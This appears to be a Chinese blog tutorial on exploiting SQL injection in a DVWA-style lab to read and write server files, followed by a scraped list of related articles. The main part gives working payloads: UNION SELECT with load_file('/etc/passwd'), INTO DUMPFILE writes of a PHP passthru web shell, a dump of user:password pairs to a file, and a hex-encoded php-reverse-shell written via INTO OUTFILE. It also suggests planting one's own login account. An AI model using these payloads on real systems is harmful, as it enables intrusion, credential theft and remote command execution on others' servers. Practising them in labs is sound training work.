1、读取文件

下载：load_file()
输入：‘union select null,load_file(’/etc/passwd’) –

加载你要查询的文件(能否成功读取要看你的用户权限)

上传：dumpfile
输入：'union select null,"<?php passthru($_GET['cmd']);?>" into dumpfile “/var/www/a.php” –

上传失败原因：
1、我们查看/etc/passwd文件发现，mysql帐号的主目录为/var/lib/mysql

2、我们查看/var/www/的属组和属主发现

只有用户www-data才有权限进行读写
3、所以我们知道若不指定木马上传的路径，他被默认放在/var/lib/mysql下，mysql用户对这个目录拥有绝对的权限；但是这样上传的木马文件我们没法利用
4、无法利用解决方法：操作系统有一个目录/tmp，这个目录所有的用户都有操作权限，我们可以先将木马上传到/tmp，然后在通过文件包含漏洞写入www目录下(www目录是网页访问的目录)
'union select null,"<?php passthru($_GET['cmd']);?>" into dumpfile “/tmp/a.php”–

输入：‘union select null,"<?php passthru($_GET['cmd']);?>" into dumpfile ‘a.php’–

上传成功
1、此时我们不知道上传文件的位置，用ssh连接到靶机后执行sudo find / -name a.php

会返回这样一条路径
2、当我们想进入这个路径时访问会被拒绝，我们查看属性发现dvwa文件夹的属主和属组为mysql，所以普通账户无法进入

3、我们切换到root，sudo -i，成功进入，发现上传文件.php

4、查看a.php:

2、下载数据库：

输入：**'union select null,concat(user,0x3a,password) from users into outfile ‘/tmp/a.db’ – **

3、编写服务器端代码：

有时候上传webshell不能满足你的需求时，你可以编写一段代码上传到服务器端，让服务器执行你的代码。
创建一个用户：

4、编码转变

输入：cp /usr/share/webshells/php/php-reverse-shell.php ./b.php
输入：cat b.php | xxd -ps | tr -d '\n’

查看b.php,以16进制显示并删掉换行符

输入：**'union select null,(0x木马文件) from users into outfile ‘/tmp/b.php’ – **

5、入侵思路

当你无法取得服务器账号和密码时，你可以自己插入一条账号和密码用来登录服务器

SQL注入：2、读写文件和下载数据库相关推荐

1. 【SQL注入-13】利用SQL注入漏洞读写文件案例

   目录 1 读写文件的前提条件 1.1 secure-file-priv参数 1.1.1 作用 1.1.2 secure-file-priv参数值的查看 1.1.2.1 远程查看 1.1.2.2 本地查 ...

2. 任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞

   发布日期:2012-11-28 更新日期:2012-12-04 受影响系统: ozerov BigDump 0.29b 描述: ------------------------------------ ...

3. 关于SQL server导入.mdf文件显示附加数据库时出错。有关详细信息，请单击“消息”列中的超链接

   关于SQL server导入.mdf文件显示附加数据库时出错.有关详细信息,请单击"消息"列中的超链接 问题原因 看了一下,应该是从别人那边拷过来的数据库文件没有本地操作系统的权限 ...

4. 泛微OA V8 SQL注入漏洞和文件上传漏洞

   fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

5. sql 读取本地txt文件批量插入数据库

   --导入 INSERT INTO [netmonsdb].[dbo].[keywordlist]([keyword]) SELECT * FROM OPENROWSET(BULK 'D:/xmsys/ ...

6. 【CyberSecurityLearning 55】SQL注入

   目录 SQL 简介 SQL注入基础 漏洞原理 漏洞危害 分类 MYSQL相关 @注释 @mysql 元数据数据库information_schema @ mysql常用的函数与参数(★) @逻辑运算 ...

7. [渗透攻防] 一.从数据库原理学习网络攻防及防止SQL注入

   这是最近自己学习渗透和网站攻防的文章,希望能深入地学习这部分知识,同时认了Na师傅和Rong师傅,知道了人外有人.天外有天,真的很享受这种探索问题.解决问题和分析知识的过程.希望文章对你有所帮助,尤其 ...

8. sql select 抛异常_mysql数据库及sql注入

   mysql数据库及sql注入 学习sql注入原理可以帮助我们写代码的时候避免一些不必要的漏洞,禁止用于违法用途. mysql -u root -p回车后数据密码(默认root)进入数据库,没有配置环境 ...

9. 数据库 -- SQL注入攻击

   SQL注入攻击_百度百科 概念 SQL注入攻击是黑客对数据库进行攻击的常用手段之一.随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于程序员的水平及经验也参差不齐,相当 ...

最新文章

1. 数组专题——找重复数字 利用下标
2. 【CVPR 2022】只用一张图+相机走位，AI就能脑补周围环境
3. char s []和char * s有什么区别？
4. Transformer温故知新
5. MySQL高级 - 锁 - 锁的概述及分类
6. 能让你纵享丝滑的SSR技术，转转这样实践
7. 直播预告 - 微软MVP为你揭秘Visual Studio 2019新特性
8. oracle rac单节点恢复,如何Oracle_RAC恢复一个节点总结
9. quick-cocos2d-x 游戏开发——StateMachine 状态机
10. 2008年国外最佳Web设计/开发技巧、脚本及资源总结
11. Linux解压/压缩命令——tar、gz、tar.gz、tgz、bz2、tar.bz2、Z、zip、rar、lha
12. 如何正确获取安卓内置SD卡的路径
13. 最新xmlns:android=http://schemas.android.com/apk/res/android的理解
14. sqlmap入门使用教程
15. SSH学习之一 OpenSSH基本使用
16. oracle 函数的使用
17. Android webview网页截取长图
18. CS academy Binary Flips（dp）
19. 重装后显示计算机无法联网,重装系统后电脑无法连接网络怎么办
20. 小米计算机无法清除,小米蓝牙怎么删除不常用设备

热门文章

1. 人人都是程序员的节奏，Python 纳入高考
2. android studio annotations,AndroidStudio 添加AndroidAnnotations -电脑资料
3. OpenCV中反向投影
4. 关注 | 新冠病毒这次的突变毒株太可怕，与人受体亲和力提高了1000倍，传播提高70%！已经成为伦敦地区主要毒株...
5. Invisor for Mac(媒体文件检查工具)v3.14免激活版
6. 1.5 编程基础之循环控制 21 角谷猜想--方法二
7. 基于 Springboot 和 Mybatis 的后台管理系统 BootD
8. 文件件服务器,文件件服务器
9. python字符数组输出_python字符串格式化输出
10. 更新Docker中的Jenkins版本